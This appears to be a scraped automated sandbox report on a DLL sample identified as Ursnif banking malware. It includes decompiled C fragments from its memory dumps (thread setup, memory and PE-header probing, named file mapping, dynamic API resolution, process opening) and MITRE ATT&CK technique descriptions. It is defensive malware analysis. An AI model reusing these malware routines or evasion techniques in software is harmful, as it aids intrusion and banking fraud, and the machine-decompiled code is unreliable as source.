Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Virtual$AllocFreememcpy
String ID: Mar 26 2021
API String ID: 4010158826-2175073649
Opcode ID: 1d4bdebf1233817810411bd73c0e8de8338617dfc0f85c4a6cb2973e9152fcf3
Instruction ID: 99bfe6870248c5f9c53b47ef89fddbb502a07b2e6690d461b83163b55550b1d4
Opcode Fuzzy Hash: 1d4bdebf1233817810411bd73c0e8de8338617dfc0f85c4a6cb2973e9152fcf3
Instruction Fuzzy Hash: FA313071E0061EAFDF01CFA9C981ADEBBB5BF49304F148169D904AB244D771AA65CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6F251D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Download Yara Rule

C-Code - Quality: 87%

			E6F251D32(void* __ecx, intOrPtr _a4) {
				long _t3;
				int _t4;
				int _t9;
				void* _t13;

				_t13 = GetCurrentThread();
				_t3 = SetThreadAffinityMask(_t13, 1); // executed
				if(_t3 != 0) {
					SetThreadPriority(_t13, 0xffffffff); // executed
				}
				_t4 = E6F2517A7(_a4); // executed
				_t9 = _t4;
				if(_t9 == 0) {
					SetThreadPriority(_t13, _t4);
				}
				asm("lock xadd [eax], ecx");
				return _t9;
			}

0x6f251d3b
0x6f251d40
0x6f251d4e
0x6f251d53
0x6f251d53
0x6f251d59
0x6f251d5e
0x6f251d62
0x6f251d66
0x6f251d66
0x6f251d70
0x6f251d79

APIs

GetCurrentThread.KERNEL32 ref: 6F251D35
SetThreadAffinityMask.KERNEL32(00000000,00000001), ref: 6F251D40
SetThreadPriority.KERNELBASE(00000000,000000FF), ref: 6F251D53
SetThreadPriority.KERNEL32(00000000,00000000,?), ref: 6F251D66

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Thread$Priority$AffinityCurrentMask
String ID:
API String ID: 1452675757-0
Opcode ID: 1ef41e4cc9982cce2377d503feb6cae500719913b772df88482f6a1ecad82798
Instruction ID: 5473cb18c9f406c259ee9965345ec4bb23dfdbf7306083750271cf999c5d15cf
Opcode Fuzzy Hash: 1ef41e4cc9982cce2377d503feb6cae500719913b772df88482f6a1ecad82798
Instruction Fuzzy Hash: 40E092313067152BD7022B2D4C89EABBB5DEF923327020335F524D21D0DB549C79CDA5

Uniqueness

Uniqueness Score: -1.00%

Function 6F25E850, Relevance: 2.3, APIs: 1, Instructions: 1034sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(000000AE), ref: 6F25F465

Memory Dump Source

Source File: 00000003.00000002.880060505.000000006F25E000.00000020.00020000.sdmp, Offset: 6F25E000, based on PE: false

Similarity

API ID: Sleep
String ID:
API String ID: 3472027048-0
Opcode ID: a2c2ba22d4654e1374292ba86ff6e0ee2e822eff99ea7bd97a8158083d2d08f1
Instruction ID: d73a66485532ddc918a52fa9effbf85ca0daf04ab8336d9aa4f884fa309e454a
Opcode Fuzzy Hash: a2c2ba22d4654e1374292ba86ff6e0ee2e822eff99ea7bd97a8158083d2d08f1
Instruction Fuzzy Hash: 3F928D72A0876A8FCB04CF3DC59815ABBE4FB9A324F08462EE494C7B59D3749529CF41

Uniqueness

Uniqueness Score: -1.00%

Function 6F25FD10, Relevance: 1.7, APIs: 1, Instructions: 195memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(6F28E720,00003043,00000040,?,6F27B8AC,?), ref: 6F25FDA5

Memory Dump Source

Source File: 00000003.00000002.880060505.000000006F25E000.00000020.00020000.sdmp, Offset: 6F25E000, based on PE: false

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 6fef2777ea1f10f035a7d9b248483c89cb820421668104c0fdaa618a24741139
Instruction ID: c7665913693116b2ec1ab62f664ff03d4943435ae58c32e3e37b6bb82880f0c9
Opcode Fuzzy Hash: 6fef2777ea1f10f035a7d9b248483c89cb820421668104c0fdaa618a24741139
Instruction Fuzzy Hash: FF815A72A01A69CFDF04CF7DC95C69ABBE1EB87324B08816AD015C7B9AD730A525CF40

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 6F252485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F252485(long _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				short* _v32;
				void _v36;
				void* _t57;
				signed int _t58;
				signed int _t61;
				signed int _t62;
				void* _t63;
				signed int* _t68;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr _t72;
				intOrPtr _t75;
				void* _t76;
				signed int _t77;
				void* _t78;
				void _t80;
				signed int _t81;
				signed int _t84;
				signed int _t86;
				short* _t87;
				void* _t89;
				signed int* _t90;
				long _t91;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				signed int _t102;
				void* _t104;
				long _t108;
				signed int _t110;

				_t108 = _a4;
				_t76 =  *(_t108 + 8);
				if((_t76 & 0x00000003) != 0) {
					L3:
					return 0;
				}
				_a4 =  *[fs:0x4];
				_v8 =  *[fs:0x8];
				if(_t76 < _v8 || _t76 >= _a4) {
					_t102 =  *(_t108 + 0xc);
					__eflags = _t102 - 0xffffffff;
					if(_t102 != 0xffffffff) {
						_t91 = 0;
						__eflags = 0;
						_a4 = 0;
						_t57 = _t76;
						do {
							_t80 =  *_t57;
							__eflags = _t80 - 0xffffffff;
							if(_t80 == 0xffffffff) {
								goto L9;
							}
							__eflags = _t80 - _t91;
							if(_t80 >= _t91) {
								L20:
								_t63 = 0;
								L60:
								return _t63;
							}
							L9:
							__eflags =  *(_t57 + 4);
							if( *(_t57 + 4) != 0) {
								_t12 =  &_a4;
								 *_t12 = _a4 + 1;
								__eflags =  *_t12;
							}
							_t91 = _t91 + 1;
							_t57 = _t57 + 0xc;
							__eflags = _t91 - _t102;
						} while (_t91 <= _t102);
						__eflags = _a4;
						if(_a4 == 0) {
							L15:
							_t81 =  *0x6f2541f8;
							_t110 = _t76 & 0xfffff000;
							_t58 = 0;
							__eflags = _t81;
							if(_t81 <= 0) {
								L18:
								_t104 = _t102 | 0xffffffff;
								_t61 = NtQueryVirtualMemory(_t104, _t76, 0,  &_v36, 0x1c,  &_a4);
								__eflags = _t61;
								if(_t61 < 0) {
									_t62 = 0;
									__eflags = 0;
								} else {
									_t62 = _a4;
								}
								__eflags = _t62;
								if(_t62 == 0) {
									L59:
									_t63 = _t104;
									goto L60;
								} else {
									__eflags = _v12 - 0x1000000;
									if(_v12 != 0x1000000) {
										goto L59;
									}
									__eflags = _v16 & 0x000000cc;
									if((_v16 & 0x000000cc) == 0) {
										L46:
										_t63 = 1;
										 *0x6f254240 = 1;
										__eflags =  *0x6f254240;
										if( *0x6f254240 != 0) {
											goto L60;
										}
										_t84 =  *0x6f2541f8;
										__eflags = _t84;
										_t93 = _t84;
										if(_t84 <= 0) {
											L51:
											__eflags = _t93;
											if(_t93 != 0) {
												L58:
												 *0x6f254240 = 0;
												goto L5;
											}
											_t77 = 0xf;
											__eflags = _t84 - _t77;
											if(_t84 <= _t77) {
												_t77 = _t84;
											}
											_t94 = 0;
											__eflags = _t77;
											if(_t77 < 0) {
												L56:
												__eflags = _t84 - 0x10;
												if(_t84 < 0x10) {
													_t86 = _t84 + 1;
													__eflags = _t86;
													 *0x6f2541f8 = _t86;
												}
												goto L58;
											} else {
												do {
													_t68 = 0x6f254200 + _t94 * 4;
													_t94 = _t94 + 1;
													__eflags = _t94 - _t77;
													 *_t68 = _t110;
													_t110 =  *_t68;
												} while (_t94 <= _t77);
												goto L56;
											}
										}
										_t69 = 0x6f2541fc + _t84 * 4;
										while(1) {
											__eflags =  *_t69 - _t110;
											if( *_t69 == _t110) {
												goto L51;
											}
											_t93 = _t93 - 1;
											_t69 = _t69 - 4;
											__eflags = _t93;
											if(_t93 > 0) {
												continue;
											}
											goto L51;
										}
										goto L51;
									}
									_t87 = _v32;
									__eflags =  *_t87 - 0x5a4d;
									if( *_t87 != 0x5a4d) {
										goto L59;
									}
									_t71 =  *((intOrPtr*)(_t87 + 0x3c)) + _t87;
									__eflags =  *_t71 - 0x4550;
									if( *_t71 != 0x4550) {
										goto L59;
									}
									__eflags =  *((short*)(_t71 + 0x18)) - 0x10b;
									if( *((short*)(_t71 + 0x18)) != 0x10b) {
										goto L59;
									}
									_t78 = _t76 - _t87;
									__eflags =  *((short*)(_t71 + 6));
									_t89 = ( *(_t71 + 0x14) & 0x0000ffff) + _t71 + 0x18;
									if( *((short*)(_t71 + 6)) <= 0) {
										goto L59;
									}
									_t72 =  *((intOrPtr*)(_t89 + 0xc));
									__eflags = _t78 - _t72;
									if(_t78 < _t72) {
										goto L46;
									}
									__eflags = _t78 -  *((intOrPtr*)(_t89 + 8)) + _t72;
									if(_t78 >=  *((intOrPtr*)(_t89 + 8)) + _t72) {
										goto L46;
									}
									__eflags =  *(_t89 + 0x27) & 0x00000080;
									if(( *(_t89 + 0x27) & 0x00000080) != 0) {
										goto L20;
									}
									goto L46;
								}
							} else {
								goto L16;
							}
							while(1) {
								L16:
								__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 + 1;
								__eflags = _t58 - _t81;
								if(_t58 < _t81) {
									continue;
								}
								goto L18;
							}
							__eflags = _t58;
							if(_t58 <= 0) {
								goto L5;
							}
							 *0x6f254240 = 1;
							__eflags =  *0x6f254240;
							if( *0x6f254240 != 0) {
								goto L5;
							}
							__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
							if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
								L32:
								_t100 = 0;
								__eflags = _t58;
								if(_t58 < 0) {
									L34:
									 *0x6f254240 = 0;
									goto L5;
								} else {
									goto L33;
								}
								do {
									L33:
									_t90 = 0x6f254200 + _t100 * 4;
									_t100 = _t100 + 1;
									__eflags = _t100 - _t58;
									 *_t90 = _t110;
									_t110 =  *_t90;
								} while (_t100 <= _t58);
								goto L34;
							}
							_t58 = _t81 - 1;
							__eflags = _t58;
							if(_t58 < 0) {
								L28:
								__eflags = _t81 - 0x10;
								if(_t81 < 0x10) {
									_t81 = _t81 + 1;
									__eflags = _t81;
									 *0x6f2541f8 = _t81;
								}
								_t58 = _t81 - 1;
								goto L32;
							} else {
								goto L25;
							}
							while(1) {
								L25:
								__eflags =  *((intOrPtr*)(0x6f254200 + _t58 * 4)) - _t110;
								if( *((intOrPtr*)(0x6f254200 + _t58 * 4)) == _t110) {
									break;
								}
								_t58 = _t58 - 1;
								__eflags = _t58;
								if(_t58 >= 0) {
									continue;
								}
								break;
							}
							__eflags = _t58;
							if(__eflags >= 0) {
								if(__eflags == 0) {
									goto L34;
								}
								goto L32;
							}
							goto L28;
						}
						_t75 =  *((intOrPtr*)(_t108 - 8));
						__eflags = _t75 - _v8;
						if(_t75 < _v8) {
							goto L20;
						}
						__eflags = _t75 - _t108;
						if(_t75 >= _t108) {
							goto L20;
						}
						goto L15;
					}
					L5:
					_t63 = 1;
					goto L60;
				} else {
					goto L3;
				}
			}

APIs

NtQueryVirtualMemory.NTDLL(?,?,00000000,?,0000001C,00000000), ref: 6F252536

Strings

@B%o, xrefs: 6F252637
@B%o, xrefs: 6F252555
@B%o, xrefs: 6F252694

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: MemoryQueryVirtual
String ID: @B%o$@B%o$@B%o
API String ID: 2850889275-1885572656
Opcode ID: a5534db8788a76a7d74932c62b2c74f1b3a39961988741d3507e43106ab588c2
Instruction ID: 3a0f74c530e1e0a01b42eec2fba465f2d4d7993608a439aa3b65c17b566f111d
Opcode Fuzzy Hash: a5534db8788a76a7d74932c62b2c74f1b3a39961988741d3507e43106ab588c2
Instruction Fuzzy Hash: 5861C1B0A0461B9FDB19CF28C8A075973B5BF85315F248169D815DB6C0E731E8B2CF50

Uniqueness

Uniqueness Score: -1.00%

Function 6F251979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E6F251979(intOrPtr __edx, long _a4, void** _a8, void** _a12) {
				intOrPtr _v12;
				struct _FILETIME* _v16;
				short _v60;
				struct _FILETIME* _t14;
				intOrPtr _t15;
				long _t18;
				void* _t22;
				intOrPtr _t31;
				long _t32;
				void* _t34;

				_t31 = __edx;
				_t14 =  &_v16;
				GetSystemTimeAsFileTime(_t14);
				_push(0x192);
				_push(0x54d38000);
				_push(_v12);
				_push(_v16);
				L6F252210();
				_push(_t14);
				_v16 = _t14;
				_t15 =  *0x6f2541d0;
				_push(_t15 + 0x6f25505e);
				_push(_t15 + 0x6f255054);
				_push(0x16);
				_push( &_v60);
				_v12 = _t31;
				L6F25220A();
				_t18 = _a4;
				if(_t18 == 0) {
					_t18 = 0x1000;
				}
				_t34 = CreateFileMappingW(0xffffffff, 0x6f2541c0, 4, 0, _t18,  &_v60);
				if(_t34 == 0) {
					_t32 = GetLastError();
				} else {
					if(_a4 != 0 || GetLastError() == 0xb7) {
						_t22 = MapViewOfFile(_t34, 6, 0, 0, 0);
						if(_t22 == 0) {
							_t32 = GetLastError();
							if(_t32 != 0) {
								goto L9;
							}
						} else {
							 *_a8 = _t34;
							 *_a12 = _t22;
							_t32 = 0;
						}
					} else {
						_t32 = 2;
						L9:
						CloseHandle(_t34);
					}
				}
				return _t32;
			}

APIs

GetSystemTimeAsFileTime.KERNEL32(?,00000002,00000000,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?,?), ref: 6F251986
_aulldiv.NTDLL(?,?,54D38000,00000192), ref: 6F25199C
_snwprintf.NTDLL ref: 6F2519C1
CreateFileMappingW.KERNEL32(000000FF,6F2541C0,00000004,00000000,?,?), ref: 6F2519E6
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F2519FD
MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000), ref: 6F251A11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F251A29
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A), ref: 6F251A32
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,6F25176E,0000000A,?), ref: 6F251A3A

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
String ID:
API String ID: 1724014008-0
Opcode ID: fb1131780f6e1e0b7e31e9dfb999fa8847e7bf32cb40715216144bf4b3327b54
Instruction ID: dfd69c9af1aa78b20dfeab140cbebf89c36a2d9310e20292f492f827e8f2f0c5
Opcode Fuzzy Hash: fb1131780f6e1e0b7e31e9dfb999fa8847e7bf32cb40715216144bf4b3327b54
Instruction Fuzzy Hash: 422171B650021CBFDB11AFE8DC89E9E77A9FB49365F104126F611DB180D6709DA4CF60

Uniqueness

Uniqueness Score: -1.00%

Function 6F251AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F251AA5(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				_Unknown_base(*)()* _t29;
				_Unknown_base(*)()* _t33;
				_Unknown_base(*)()* _t36;
				_Unknown_base(*)()* _t39;
				_Unknown_base(*)()* _t42;
				intOrPtr _t46;
				struct HINSTANCE__* _t50;
				intOrPtr _t56;

				_t56 = E6F251C8F(0x20);
				if(_t56 == 0) {
					_v8 = 8;
				} else {
					_t50 = GetModuleHandleA( *0x6f2541d0 + 0x6f255014);
					_v8 = 0x7f;
					_t29 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f2550e1);
					 *(_t56 + 0xc) = _t29;
					if(_t29 == 0) {
						L8:
						E6F25136A(_t56);
					} else {
						_t33 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f2550f1);
						 *(_t56 + 0x10) = _t33;
						if(_t33 == 0) {
							goto L8;
						} else {
							_t36 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f255104);
							 *(_t56 + 0x14) = _t36;
							if(_t36 == 0) {
								goto L8;
							} else {
								_t39 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f255119);
								 *(_t56 + 0x18) = _t39;
								if(_t39 == 0) {
									goto L8;
								} else {
									_t42 = GetProcAddress(_t50,  *0x6f2541d0 + 0x6f25512f);
									 *(_t56 + 0x1c) = _t42;
									if(_t42 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t56 + 8)) = _a8;
										 *((intOrPtr*)(_t56 + 4)) = _a4;
										_t46 = E6F2518D1(_t56, _a12);
										_v8 = _t46;
										if(_t46 != 0) {
											goto L8;
										} else {
											 *_a16 = _t56;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}

APIs

Part of subcall function 6F251C8F: HeapAlloc.KERNEL32(00000000,?,6F25117D,?,00000000,00000000,?,?,?,6F251810), ref: 6F251C9B

GetModuleHandleA.KERNEL32(?,00000020,00000002,?,?,?,?,6F251272,?,?,?,?,00000002,00000000,?,?), ref: 6F251AC9
GetProcAddress.KERNEL32(00000000,?), ref: 6F251AEB
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B01
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B17
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B2D
GetProcAddress.KERNEL32(00000000,?), ref: 6F251B43

Part of subcall function 6F2518D1: memset.NTDLL ref: 6F251950

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressProc$AllocHandleHeapModulememset
String ID:
API String ID: 426539879-0
Opcode ID: 7768664be4c8dff304b7e7ff4a0a974dbcb024f0c284e8aca2bdfe26c034a469
Instruction ID: fb1d005e9b641c439ab382ba61ea6aad72f86f0e1cd73cb1c5051ee19d1f1a6e
Opcode Fuzzy Hash: 7768664be4c8dff304b7e7ff4a0a974dbcb024f0c284e8aca2bdfe26c034a469
Instruction Fuzzy Hash: 37213BB160070EAFDB50DF69C894E5A7BECFF09298B008526E815CB611E734E975CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6F25146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6F25146C() {
				void* _t1;
				long _t3;
				void* _t4;
				long _t5;
				void* _t6;
				intOrPtr _t8;

				_t8 =  *0x6f2541b0;
				_t1 = CreateEventA(0, 1, 0, 0);
				 *0x6f2541bc = _t1;
				if(_t1 == 0) {
					return GetLastError();
				}
				_t3 = GetVersion();
				if(_t3 <= 5) {
					_t4 = 0x32;
					return _t4;
				} else {
					 *0x6f2541ac = _t3;
					_t5 = GetCurrentProcessId();
					 *0x6f2541a8 = _t5;
					 *0x6f2541b0 = _t8;
					_t6 = OpenProcess(0x10047a, 0, _t5);
					 *0x6f2541a4 = _t6;
					if(_t6 == 0) {
						 *0x6f2541a4 =  *0x6f2541a4 | 0xffffffff;
					}
					return 0;
				}
			}

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,6F2517B8,747863F0,00000000), ref: 6F25147B
GetVersion.KERNEL32 ref: 6F25148A
GetCurrentProcessId.KERNEL32 ref: 6F251499
OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 6F2514B2

Memory Dump Source

Source File: 00000003.00000002.879914739.000000006F251000.00000020.00020000.sdmp, Offset: 6F250000, based on PE: true

Associated: 00000003.00000002.879879175.000000006F250000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.879960105.000000006F253000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.880000556.000000006F255000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.880035298.000000006F256000.00000002.00020000.sdmp Download File

Similarity

API ID: Process$CreateCurrentEventOpenVersion
String ID:
API String ID: 845504543-0
Opcode ID: fa5c3ee0013b5a2744261e81a54cc3159c881668eae7aad6949aa86b9604394d
Instruction ID: d1269bcd9518d9f1beae657eecf5ded8f7bc99cfb57f78f6ecc792ef8328557c
Opcode Fuzzy Hash: fa5c3ee0013b5a2744261e81a54cc3159c881668eae7aad6949aa86b9604394d
Instruction Fuzzy Hash: F3F09A30644B11AFEF408F79AC2E782BBA1BB06B32F00901AF105C98C0D3B058B0CFA4

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report c3.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

Unpacked PEs

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Key, Mouse, Clipboard, Microphone and Screen Capturing:

E-Banking Fraud:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted IPs

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Exports

Version Infos

Possible Origin

Network Behavior

Code Manipulations

Statistics

CPU Usage

Memory Usage

Behavior

System Behavior

Analysis Process: loaddll32.exe PID: 6364 Parent PID: 1228

General

Chronological Activities

Function 6F2517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6F251E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6F251CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6F2515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6F251D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6F252485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Function 6F25146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON

Function 6F251566, Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Function 6F251F31, Relevance: 3.1, APIs: 2, Instructions: 92
libraryloaderCOMMON

Function 6F252264, Relevance: .1, Instructions: 77
COMMONCrypto

Function 6F251979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6F251AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6F2517A7, Relevance: 15.1, APIs: 10, Instructions: 103
threadsleepsynchronizationCOMMON

Function 6F251E04, Relevance: 9.1, APIs: 6, Instructions: 71
memoryCOMMON

Function 6F251CA4, Relevance: 9.0, APIs: 6, Instructions: 32
threadinjectionCOMMON

Function 6F2515A3, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 96
memoryCOMMON

Function 6F251D32, Relevance: 6.0, APIs: 4, Instructions: 30
threadCOMMON

Function 6F252485, Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195
nativeCOMMON

Function 6F251979, Relevance: 13.6, APIs: 9, Instructions: 81
filetimeCOMMON

Function 6F251AA5, Relevance: 9.1, APIs: 6, Instructions: 81
libraryloaderCOMMON

Function 6F25146C, Relevance: 6.0, APIs: 4, Instructions: 34
COMMON